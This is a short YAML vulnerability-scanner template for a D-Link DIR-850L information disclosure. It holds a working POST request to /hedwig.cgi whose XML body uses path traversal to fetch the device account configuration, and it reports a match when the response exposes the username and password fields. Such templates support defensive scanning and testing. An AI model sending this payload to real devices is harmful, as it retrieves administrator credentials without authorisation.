id: dlink-850l-info-leak

info:
    name: Dlink 850l Information Disclosure
    author: cc_ci(https://github.com/cc8ci)
    severity: medium

rules:
    r0:
        request:
            method: POST
            path: /hedwig.cgi
            headers:
                Content-Type: text/xml
                Cookie: uid=R8tBjwtFc8
            body: <?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>
        expression: response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>") && response.body.bcontains(b"<result>OK</result>")
expression: r0()

